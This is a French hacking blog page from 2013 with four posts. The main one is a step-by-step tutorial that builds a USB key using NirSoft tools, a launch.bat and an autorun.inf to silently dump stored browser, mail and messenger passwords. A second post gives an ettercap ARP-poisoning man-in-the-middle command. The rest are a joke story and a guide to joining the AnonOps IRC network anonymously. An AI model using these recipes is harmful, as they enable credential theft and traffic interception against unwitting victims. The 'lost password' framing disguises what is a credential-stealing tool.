jeudi 14 février 2013

TUTO HACK: Création d’une clé USB rootkit


adata-909-thumb-drive
Aujourd’hui nous allons voir comment créer une clé USB qui récupère les mots de passe d’un ordinateur. Ce rootkit s’exécute automatiquement et récupère la plupart des mots de passe stocker sur votre ordinateur. Il est vraiment très utile surtout quand on a perdu ses mots de passe.
Pour créer notre rootkit on doit suivre les étapes suivantes:

Étape 1

Nous allons dans un premier temps télécharger quelque logiciels qui nous permettent de déchiffrer les mots de passe des applications les plus courantes. Toutes ces applications sont issues du site Nirsoft (http://www.nirsoft.net/).
  • MessenPass
  • Mail PassView
  • ChromePass
  • IE Passview
  • PasswordFox
  • Protected Storage PassView
  • Network Password Recovery
  • WirelessKeyView


usb1 TUTO HACK: Création d’une clé USB rootkit

Voici le Packs complets :  http://www.multiupload.nl/W9C4LACNTW
puis nous allons placez tous les fichier .exe  sur notre clé USB.

Étape 2

Ensuite il nous faut créé un fichier launch.bat qui va ouvrir les programmes de récupération de mot de passe et il va  stocker les résultats dans un fichier texte.
Pour cela : on doit créer un nouveau document texte avec bloc note ou autres et écrire le code ci-dessous.
1start mspass.exe /stext dossier1/mspass.txt
2start mailpv.exe /stext dossier/mailpv.txt
3start pspv.exe /stext dossier1/pspv.txt
4start iepv.exe /stext dossier1/iepv.txt
5start PasswordFox.exe /stext dossier1/PasswordFox.txt
6start ChromePass.exe /stext dossier1/ChromePass.txt
Attention a bien vérifier que les noms de fichiers correspondent bien aux noms de launch.bat .
Comme vous avez pu le voir dans les lignes ci dessus, lorsque le logiciel sera exécutez , ces logs seront envoyé dans un dossier appelé dossier1. Il nous faut donc créé un nouveau dossier.

Étape 3

Maintenant nous devons créer le fichier autorun.inf
Lorsque vous insérez votre cléf USB généralement une fenêtre apparaît en nous demandant ce que l’on désire faire !
Dans cette étape nous allons créé une nouvelle option dans cette fenêtre , qui nous permettra ( une fois cliquez dessus ) de récupérez les mots de passes du pc et de les stockés dans le dossier créé dans l’étape 2 .
Pour réalisez ceci on ouvre un nouveau document texte puis on insère ce code :
1[autorun]
2 
3open=launch.bat
4 
5ACTION="Le nom de la nouvelle option"
Puis on enregistre sous : autorun.inf
Notre rootkit est maintenant près, il ne reste plus qu’à le tester. icon biggrin TUTO HACK: Création d’une clé USB rootkit

ARP cache poisoning avec Ettercap


On parle souvent des failles applicatives concernant l’erreur humain, dans cet article, nous allons voir que des vulnérabilités peuvent aussi venir des protocoles réseaux.
L’arp cache poisoning est une attaque qui consiste à exploiter la faille du protocole ARP situé en couche 3 du modèle OSI. Il consiste à bombarder un routeur de requête ARP en lui faisant croire que l’on est quelqu’un d’autre. Au bout d’un moment, cela va provoquer la mise à jour du cache ARP. Le but est de se placer entre la victime et son routeur afin de capturer tout le trafic entre deux machines distantes.

A quoi sert le protocole ARP ?

Le protocole ARP permet de connaître l’adresse physique d’une carte réseau correspondant à une adresse IP, c’est pour cela qu’il s’appelle Protocole de résolution d’adresse.
Le protocole ARP permet de déterminer l’adresse MAC d’une machine distante. Lorsqu’une machine souhaite connaître l’adresse MAC d’une autre, elle envoie à tous les membres de son sous-réseau un packet arp who-as en demandant quelle est l’adresse MAC de la machine qui a telle adresse ip.
La machine qui possède cette adresse IP sera la seule à répondre en envoyant à la machine émettrice une réponse ARP du type « je suis adresseIP et voici mon adresse MAC  ».
La machine à l’origine de la requête ARP reçoit la réponse, met à jour son cache ARP et peut donc commencer à envoyer des messages.
Le contenu de ce cache est temporaire. Cela signifie qu’il faudra tout de même réitérer l’envoi de requête ARP mais de façon beaucoup moins fréquente.
Pour voir le contenu du cache sous windows, tapez la commande suivante :
1arp -a
sous Linux :
1arp -n

Ou se situe la faille du protocole ARP ?

Avec le protocole ARP, nous pouvons communiquer à une machine notre adresse MAC  à n’importe quel moment en lui envoyant un simple packet ARP reply. Cela mettra à jour son cache ARP. Maintenant, imaginez qu’on envoie un packet arp reply à une machine avec de fausses informations…C’est à ce moment que l’arp cache poisoning intervient . On peut facilement passer pour une machine qu’on n’est pas et de ce fait intercepte le dialogue entre deux hôtes.

Comment réaliser cette attaque ?

Lors d’une navigation normale sur internet, les données d’un utilisateurs sont envoyées au routeur, puis du routeur, sont envoyées au serveur web.
Lors d’une attaque de type ARP poisoning, le pirate va se glisser entre les données envoyés par l’utilisateur et le routeur.
Main the middle ARP cache poisoning avec Ettercap
Pour réaliser ce type d’attaque et capturer du trafic entre deux hôtes distants, il est possible de se munir de différent outils. Ici nous utiliserons l’outil « Ettercap » qui est spécialisé dans ce genre de domaine.
Ettercap est un logiciel libre. Pour l’installer, lancez la commande suivante :
1apt-get install ettercap wireshark
Une fois installé, il suffira de taper :

ettercap -T -q -M arp:remote /192.168.230.128/ /192.168.230.1/ -w « monfichier »
Explication de la commande :
-T : lance ettercap en mode texte
-M : indique que l »on doit se placer entre les deux ip’s et que l’on veut une attaque de type « Man in the middle »
-w : enregistre le résultat de la capture dans un fichier
Dans mon cas,  la machine cible  a l’adresse IP 192.168.230.128 et  le routeur de sortie a l’adresse IP 192.168.230.1
arp poising ARP cache poisoning avec Ettercap
Pour finir l’attaque et récupérer les données,  il faut appuyer sur la touche q.
Enfin vous pouvez ouvrir  le fichier sorti « monfichier » avec un logiciel comme « Wireshark » pour analyser chaque requête faite à travers le réseau.
Pour plus de nouveautés, merci de vous abonner à la newsletter du blog 

L’Histoire De L’un Des Meilleurs Hacker Que Le Monde Est Jamais Connu



ikea-hacker-L-2   Je partage avec vous une histoire  que j’ai trouvé sur le site pcinpact.com (version résumée), c’est l’histoire de l’un des meilleurs hackers que le monde a connu.
Il s’agit d’un pirate qui s’est connecté sur un canal de discussion IRC pour discuter avec ses amis, soudain sa connexion au serveur est perdue (Ping timeout).
Il revient et agresse une des personnes gérant le canal, l’accusant de l’avoir déconnecter du canal. Le modérateur se défend mais le furieux ne veut rien entendre.
Notre hacker menace le modérateur de lui crasher son système. Il lui demande alors son adresse IP, le modérateur répond : 127.0.0.1
Le méchant hacker essai de s’introduire sur l’adresse qu’on lui a donnée, et pour ça, notre ami sait s’y prendre, tellement ses connaissances sont imposantes. Il va se faire un plaisir d’utiliser le magnifique outil qu’il a du trouver quelque part sur eMule. Un outil du genre « Hacking for newbies ». Bizarrement la discussion s’arrête brutalement avec un autre timeout. Et oui, le pirate vient de se pirater tout seul.
Il revient dans le canal, en annonçant au modérateur qu’il a de la chance parce que sa machine vient de planter. C’est effrayant tout de même. Le modérateur redonne « son » adresse IP : 127.0.0.1. Le hacker lui dit « buy buy » et…disparaît à nouveau du canal.
Il revient et accuse le modérateur d’utiliser un firewall.
Le hacker explique que se cacher derrière un firewall est honteux et qu’en plus son attaque lui est revenue dans la figure.
Le modérateur annonce qu’il a désactivé son firewall et qu’il attend la juste punition.
Le hacker va donc entrer dans les disques durs du modérateur et lui effacer toutes ses données. Le modérateur prie pour son salut, mais le hacker ne veut rien savoir.
hacker Histoire de lun des meilleurs hackers
Il annonce avoir formaté le disque G, le disque F passe lui aussi à la trappe, puis le E. Le modérateur se demande s’il aurait sous-estimé le hacker, après tout le E contient tout ses jeux et toutes ses photos. Mais non tout est là.
Le hacker annonce ainsi fièrement qu’il vient de formater le D. Il prouve sa force au modérateur qui n’a d’autre choix que de reconnaître les talents du bonhomme, puisque ce dernier vient de formater le lecteur de CD.
Vient enfin le moment critique où le hacker déclare plein d’excitation que le formatage du disque C en est à 30%. Dans ses derniers instants de gloire sublimée, le hacker se moque du modérateur et lui recommande de ne plus jamais donner son adresse IP sur Internet. Subitement, frappé par la foudre en pleine ascension, le hacker disparaît.
Ainsi  s’envolait le pirate, victime du formatage de ses propres disques. icon biggrin Histoire de lun des meilleurs hackers
Encore un 3l1t2 h4ck3r qui disparaît…

Comment Se Connecter Avec Xchat Sur Un IRC ?



Comment se connecter avec Xchat sur un IRC ? dans Informations sur un sujet xchat.logo_

 I. Installez le client XChat
1. Pour télécharger XChat :
http://xchat.org/download/ (version officielle)
2. Installez-le.
3. Lancez XChat, un menu s’ouvre avec plusieurs options.
II. Configurez le client XChat
1. Entrez le pseudo de votre choix dans les cases « Pseudonyme » et « Second choix », « Nom d’utilisateur » et « Nom réel » (Ne mettez pas votre vrai nom !!!). Laissez le reste vide.
2. Sélectionnez « Ajouter » et entrez un nom pour le réseau IRC d’Anon (par exemple : AnonIRC, ou IRC AnonOps WebChat).
3. Sélectionnez le nouveau réseau créé et sélectionnez « Éditer ».
4. Sélectionnez « newserver/6667″ et cliquez sur « Éditer ».
5. Remplacez par : irc.anonops.bz/6697 (validez avec la touche Entrée).
6. Cochez les cases suivantes :
  • Ne se connecter qu’aux serveurs sélectionnés.
  • Utiliser SSL pour tous les serveurs de ce réseau.
  • Accepter un certificat SSL non valable.
7. Sélectionnez « Fermer » et ensuite  « Connecter ».
8. Cliquez sur le bouton « Fermer ».
Vous pouvez passer à l’étape 3, pour savoir comment utiliser IRC (voir ci-dessous)
Si vous rencontrez une erreur, assurez-vous d’avoir bien spécifié le nom du serveur : irc.anonops.bz/6697
lulzsec-anon-handbook-hack AnonOps dans Informations sur un sujet
III. Débuter sur IRC
Note: Nombre d’informations présentes dans ce document sont juste des détails. Vous n’avez pas besoin de tout savoir.
La lecture des commandes vous suffira probablement.
Note:  Pour utiliser les commandes suivantes, remplacer les mots à l’intérieur des « [ ] » par vos propres choix et supprimer les « [ ] » eux-mêmes. Exemple: « /nick  [votrePseudo] » deviendra « /nick pseudoChoisi »
    Étape 1 
MISE EN ROUTE 

Attention ! Vous trouverez sur cette page plusieurs commandes  à taper dans votre client IRC. Celles-ci sont toujours précédées d’un slash ( / ), afin de les signaler à l’interpréteur. Si vous oubliez le slash, vous risquez d’envoyer au salon des informations sensibles, comme votre mot de passe lors de votre identification.
1. Tout d’abord votre propre pseudo. 
Le surnom, communément appelé « pseudo (nick) » apparaitra devant tous tes messages sur IRC, pour que tout le monde sache qui parle. Vous pouvez choisir n’importe quel surnom, à condition que personne d’autre ne l’utilise avant.
Un pseudo ne peut être composé que de lettres (a-z, A-Z), de chiffres (0-9), et de quelques caractères spéciaux. Les espaces notamment sont proscrits.
Pour modifier votre nick:
 /nick [votre_pseudo
Exemple:
 /nick jeSuisNouveauAidezMoi
2. Maintenant, vous devez enregistrer votre pseudo 
L’inscription consiste essentiellement à créer un compte sur le réseau AnonOps, le  pseudo n’appartiendra qu’à vous, et personne d’autre ne pourra l’utiliser. Il y a d’autres avantages, bien sûr, y compris la capacité à être reconnu et les capacités d’administration sur les canaux.
Pour enregistrer votre pseudo actuel, utilisez :
    /msg nickserv register [password] [email faux] 
Par exemple:
    /msg nickserv register whatTHEpassword fake@email.com  
NOTE: Si vous perdez votre mot de passe, vous ne serez pas en mesure de récupérer votre pseudo et devrez en créer un nouveau !
3. Connectez-vous! 
Pour vous connecter [i.e. "identifier"] manuellement, utilisez /nick [votrePseudo] puis :
    /msg nickserv identify [password] 
Exemple:
    /msg nickserv identify votreMotDePasse

Attention ! N’oubliez surtout pas le slash en début de ligne, sinon, vous révèlerez votre mot de passe à tout le monde. 
Vous  devrez vous connecter à votre pseudo à chaque connexion mais la plupart des clients IRC vous permettent de définir un pseudo/nick et mot de passe par défaut pour ce pseudo via une option appelée « Nickserv pass » quelque part dans les paramètres. Cherchez dans des préférences de votre logiciel client.
4. Après votre inscription - Consulter la liste des salons :
#opnewblood est le canal d’aide par défaut pour les nouveaux utilisateurs.
Posez-y toutes les questions dont vous ne trouvez pas les réponses dans le topic du salon et vous obtiendrez des réponses, ou (vous serez dirigé vers d’autres canaux qui pourront mieux vous répondre) du moins quelqu’un vous dira vers où chercher.
Alternativement, vous pouvez également trouver d’autres canaux à l’aide d’une commande de liste. Pour trouver un canal avec un mot-clé qu’il contient, utiliser:
/list 
Exemple:
/list newblood
Cela permet d’afficher une liste de canaux dont les noms contiennent le mot-clé que vous recherchez, tels que #opnewblood. Alternativement, vous pouvez simplement taper :
/list 
Ceci renvoie une liste de tous les salons publiques actuellement sur le réseau. Il y a beaucoup de salons et de nouveaux apparaissent chaque jour.
/list #op*
Pour obtenir la liste de tous les salons dont le nom commence par #op (#OperationGreenrights, #OperationFreedom, etc…)
5. Vous avez repéré un salon Étape suivante :
Maintenant, vous devez rejoindre un salon. Les salons commencent par une balise de  hachage, ou un symbole « #« , et comme dit précédemment, les salons sont essentiellement des « chatrooms ». Chacun  est centré autour d’un thème ou un sujet (tapez « /topic » dans votre client pour visualiser le sujet d’un salon de discussion), par exemple les salons d’opérations, les salons plus spécifiques ou les salons généraux.
Pour rejoindre un canal, utilisez:
    /join [#nomDuCanal
Exemples:
    /join #opnewblood 
    /join #francophone 
     Etape 2 : 
FONCTIONS AVANCEES

2.1 ) Commandes
1) /join
Cette commande parle d’elle-même, elle est utilisée pour rejoindre un canal. Pour rejoindre #opnewblood , vous tapez /join #opnewblod
2) /me
Cette commande permet d’écrire une action de votre part sur le canal. C’est juste pour le fun, l’action ne sera bien sûr pas réalisée. /me chante apparaîtra ainsi : « anon chante »
3) /msg
Si vous voulez parler en privé avec un anon, le mieux est de lui envoyer un message. Tapez /msg username message ici. Assurez-vous d’utiliser un espace entre le username et le message
4) /query
Même fonction que /msg avec en plus ouverture d’une boite de dialogue avec l’anon.
5) /nick
Cette commande modifie votre pseudo. Par exemple, si vous voulez vous appeler gigapuddi, tapez /nick gigapuddi. Cependant, gardez à l’esprit qu’ainsi, vous ne serez plus enregistré à moins de vous re-enregistrer avec nickserv (voir en 5.2)
6) /quit
Cette commande vous déconnecte du serveur
7) /ignore
Les Trolls sont légion, le mieux est de ne pas les alimenter et de les ignorer. Pour ignorer quelqu’un, tapez /ignore username
8) /whois
Cette commande affiche les informations d’un utilisateur, comme son vhost, les canaux auxquels il participe, etc. Pour cela, tapez /whois username
9) /away
Vous devez utiliser cette commande pour signaler vos absences. Si vous partez faire des courses, tapez /away en courses et les gens sauront que vous êtes parti faire des courses.
10) /ping
Cette commande permet de voir le temps de réponse du serveur. Si vous lagguez, cela vous permettra d’en diagnostiquer la cause. Pour lancer une requête ping sur un serveur, tapez /ping adresseip (pour connaître votre adresse IP, accédez à l’invite de commandes et tapez ipconfig)
11) /notify on/off
Cete commande permet d’activer/désactiviter la notification sonore lorsque quelqu’un tape votre pseudo.
12) /topic
Cette commande permet d’afficher le sujet du salon sur lequel vous êtes.
13) /list
Cette commande affiche la liste des salons qui vous sont accessibles.
2.2) Utiliser l’IRC
NickServ
        Quand vous arrivez sur l’IRC pour la première fois, vous utilisez un pseudo non enregistré. Si vous prevoyez de devenir un utilisateur régulier, il est vital d’enregistrer votre pseudo, ceci pour plusieurs raisons :
  • cela assure que personne ne prendra votre identité
  • cela vous donne des permissions en plus par rapport aux utilisateurs non enregistrés
  • le plus important, cela vous permet d’avoir un vhost qui cache votre localisation et les informations de votre fournisseur d’accès.
        Pour enregistrer votre pseudo, référez-vous au guide IRC de votre système sur le pad #OpNewblood maître.
Quand vous vous connectez au serveur IRC, tapez  /msg nickserv IDENTIFY password. Vous serez ainsi authentifié sur nickserv. Si vous ne faites pas ça, vous n’aurez pas accès aux canaux réservés aux utilisateurs enregistrés ni à votre vhost. Pour des raisons de sécurité, il est recommandé de taper la commande dans la fenêtre de statut. Vous éviterez ainsi de dévoiler votre mot de passe à tout le salon en cas d’erreur de frappe.
Groupes
Si vous prévoyez d’utiliser plus d’un nom d’utilisateur vous pouvez les regrouper. Il peut y avoir plusieurs intérêts, les principaux sont de pouvoir dire aux gens d’où vous vous connectez ou que vous êtes absent.
Exemple : Un utilisateur nommé « JohnDoe » semble être absent pour un certain temps mais il a laissé son Laptop allumé, dans ce cas il peut changer son nick en « JohnDoe|Away ou JohnDoe|AFK afin de faire savoir aux autres utilisateurs qu’il est absent. Ceci est important afin que, pour exemple, les gens sauront pourquoi vous ne répondez pas aux messages.
Il peut également utiliser le nick JohnDoe|Mobile pour faire savoir qu’il est sur un client mobile et de ce fait ne peut utiliser certaines fonctions comme recevoir des messages privés ou visiter des liens envoyés par des utilisateurs.
Pour changer votre pseudo, tapez /nick nouveau_pseudo. Cependant en faisant cela, vous perdrez tous vos niveaux d’accès, vhost, et autres configurations associées à votre pseudo.
Afin d’empêcher cela, lorsque vous choisissez votre nouveau pseudo, basculez vers celui-ci en utilisant /nick, puis tapez « /msg nickserv GROUP nick password » où nick et password sont vos nick et passwords PRINCIPAUX. Cela assurera que ces nicks partageront les passwords et les configurations.
Ghosts
Acceptez-le, parfois une merde arrive. Parfois votre connexion internet décidera aléatoirement de mourir dans vos bras. Parfois la batterie de votre portable se videra, parfois votre client IRC plantera, parfois vous fermerez accidentellement une fenêtre. Il y a pleins de raisons qui soudainement vous déconnecteront accidentellement de l’IRC
 Le problème est que à moins que les personnes se déconnectent de manière « propre », le serveur ne réalisera pas qu’ils sont partis. Pensez à quelqu’un qui rangerait son téléphone dans sa poche et continuerait à marcher avec, mais sans raccrocher l’appel. Ou quand votre ordinateur plante sans s’éteindre de la bonne manière. Dans ces circonstances, le serveur IRC ne réalise pas que vous êtes parti, et pense que votre pseudo est toujours connecté. Cette situation perdure jusqu’aux prochains pings sur votre pseudo et qu’aucune réponse n’est renvoyé (‘ping timeout’). Cela peut prendre un certain temps et bien souvent les personnes s’étant déconnectées pourront faire en sorte de se reconnecter avant même que le serveur ait le temps de réaliser qu’elles étaient parties. Lorsque cela arrive, le nom d’utilisateur est déjà utilisé, et le serveur en assignera un nouveau (habituellement en ajoutant ` ou _ à la fin du pseudo, donc si JohnDoe essaie de se connecter alors qu’il y a déjà un JohnDoe de connecté, il se verra assigner JohnDoe_ ou JohnDoe`.
Le problème avec ça, bien sûr, est que comme tout pseudo non enregistré, ces pseudos n’auront ni modes, ni vhosts, ni niveaux d’accès – car le « ghost » du pseudo les occupera toujours.
Pour forcer la session morte à se déconnecter et remplacer ce pseudo avec le votre, tapez /msg nickserv GHOST mot_de_passe, ou mot_de_passe est le mot de passe original de votre pseudo. Cela fera, dans cet exemple, déconnecter JohnDoe et changer JohnDoe_ en JohnDoe automatiquement, identifiant et configurant le pseudo normalement. Lorsque cela arrive, vous verrez probablement quelque chose comme ceci sur le channel:
JohnDoe left the chat room (GHOST command used by JohnDoe_)
JohnDoe_ is now known as JohnDoe
Il est très important de faire cela aussi rapidement que possible lorsque vous vous reconnectez puisque vous serez bloqué de votre vhost tant que vous ne l’aurez pas fait.
Vhosts
Évidemment une des propriétés principales de tout Anonymous est d’être bien.. Anonyme.
 Lorsque vous vous connectez à notre server IRC, le serveur va automatiquement masquer votre adresse IP (le « numéro de téléphone » de votre ordinateur). Ceci est la couche la plus importante de votre anonymat, mais malheureusement il y a un hic. La plupart du temps, il ne masquera PAS automatiquement le nom de votre FAI (Fournisseur d’Accès Internet). Donc par exemple le fait que votre IP vient d’une certaine ville peut être masqué, mais le fait que vous soyez par exemple un utilisateur de FREE ne l’est pas.
Pour pallier à cela nous disposons d’un vHostServ. Cela vous donne un faux nom d’hôte, ce qui masque le vrai FAI auquel vous êtes connecté. Cela peut-être ce que vous voulez – par exemple, si quelqu’un a déjà essayé de vérifier d’où je me connecte, ils verront « casse.toi.pauv.con » à la place. :D
Pour obtenir un vHost, vous devez être enregistré et identifié. C’est pourquoi il est CRUCIAL que vous vous identifiez ( le plus tôt possible lorsque vous vous connectez puisque votre vHost ne sera pas actif tant que vous ne l’aurez pas fait.
Comment obtenir un vHost:
1. Tapez /join #vhost dans IRC. (Notez qu’il est nécessaire d’avoir un pseudo enregistré, comme expliqué dans la section 5.2)
2. Puis une fois dans votre channel vHost, tapez !vhost (inserez.un.nom.intelligent.ici)
NOTE   : Vous pouvez, bien sûr, utiliser n’importe quel vHost – fournissez en un valide, i.e. pas d’espaces, et avec au minimum un point. La façon la plus commune est d’utiliser par conséquent des.points.comme.espaces.dans.votre.vHost.
Lorsque vous avez fait cela, vHostServ vous kickera et vous bannira du channel #vhost. C’est normal et attendu, cela veut simplement dire que le vHost a fonctionné. Vous serez banni du channel (#vhost) pour un certain laps de temps, après quoi vous serez capable à nouveau de changer votre vHost si vous le voulez. Maintenant que vous avez votre vhost, vous êtes pleinement équipé pour utiliser IRC, n’importe quelles autres options que vous associerez à votre pseudo sont purement optionnelles.
*Note: Si vous rejoignez un #chan avant votre vHost, cette nouvelle information anonymisée ne sera pas automatiquement mise à jour sur le channel. Soyez sur de quitter et de rejoindre tous les channels auxquels vous êtes connecté après votre  vHost, ou vos informations réelles seront toujours visibles
**NOTE: Si vous utilisez Xchat conjointement avec la connexion automatique aux channels, vous pouvez spécifier à Xchat d’attendre un peu plus longtemps avant de rejoindre les channels sur le serveur en utilisant /set irc_join_delay X , ou X est le nombre de secondes que xchat devra attendre avant de joindre ces  channels. Configurez sur environ 10 secondes aide si vous utilisez la connexion automatique aux channels.
Channels sur invitations seulement (mode +i)
Certains channels, pour des raisons variées sont sur invitation seulement. En règle générale c’est parce que le channel a un but spécifique et seulement les personnes ayant une tâche particulière sur le channel peuvent y accéder – par exemple, certains channels sont privés pour les opérateurs et les hackeurs.
Parfois, un channel pourra aussi être  temporairement mis +i s’il est en train de se faire envahir ou flooder par des bots ou des trolls.
        Si un channel est +i, vous ne pourrez pas le rejoindre en utilisant /join. Vous recevrez seulement un message d’erreur vous disant que ce channel est sur invitation uniquement. Cependant si vous êtes un opérateur vous-même, ou sur la liste d’exception des invités, vous pouvez forcer le serveur à vous laisser entrer.
Pour faire ceci, envoyez un message à un autre bot appelé ChanServ, qui n’est pas couvert dans ce guide car en général seuls les utilisateurs les plus avancés auront besoin de s’en servir un jour. Pour demander une invitation tapez /msg chanserv INVITE #channel, ou #channel est le channel où vous essayez de vous connecter. Il est important d’insérer le # au début du nom du channel car sinon ChanServ ne le reconnaitra pas.
Si vous êtes sur la liste vous recevrez ensuite un message vous demandant si vous voulez joindre le channel. Sinon, chanserv vous dira que vous n’avez pas la permission.
Si vous n’êtes PAS sur la liste d’invitation ou un opérateur du channel, mais que vous pensez qu’il devrait vous être permis d’y entrer vous pouvez toujours taper /knock message, ou le message est le message s’adressant aux administrateurs du channel. Donc par exemple si il y a un channel appelé #suisses seulement pour les Suisses, auquel vous n’avez pas accès, vous pouvez taper /knock #suisses Hey, je suis Suisse, laissez moi entrer!
Ceci enverra un message au channel des admins, et fera apparaitre votre message sur le channel. Les admins alors (s’ils ont décidé de vous laisser rentrer) vous enverront une invitation tout comme chanserv le fait. Vous recevrez le meme message que vous auriez reçu de chanserv vous demandant si vous voulez rejoindre le channel.
NOTE: Toquer (‘ to knock ‘) sur un channel dix fois d’affile ne risque pas d’amuser les admins et occupants du channel. De toute évidence, cela rendra en réalité quasiment certain le fait que vous ne serez PAS invité dans le channel. Si vous ne recevez pas d’invitation cela peut signifier que les administrateurs ne sont pas actifs pour le moment, ou qu’ils ont décidé pour certaines raisons de ne pas vous inviter. Si cela arrive, vous devriez peut-être réessayer plus tard, mais toquer dix fois en une minute est plutôt un bon moyen de vous faire bannir.
Si personne ne vous répond, une autre option que vous avez est de taper /msg chanserv INFO #channel, ou #channel est le nom du channel (encore une fois, incluez le # ou chanserv ignorera votre message). Ceci vous précisera dans quel but et qui a créé ce channel. Vous pourrez ensuite envoyer un message à son fondateur et lui demander un accès, mais ce n’est généralement pas recommandé à moins que cela ne soit extrêmement urgent.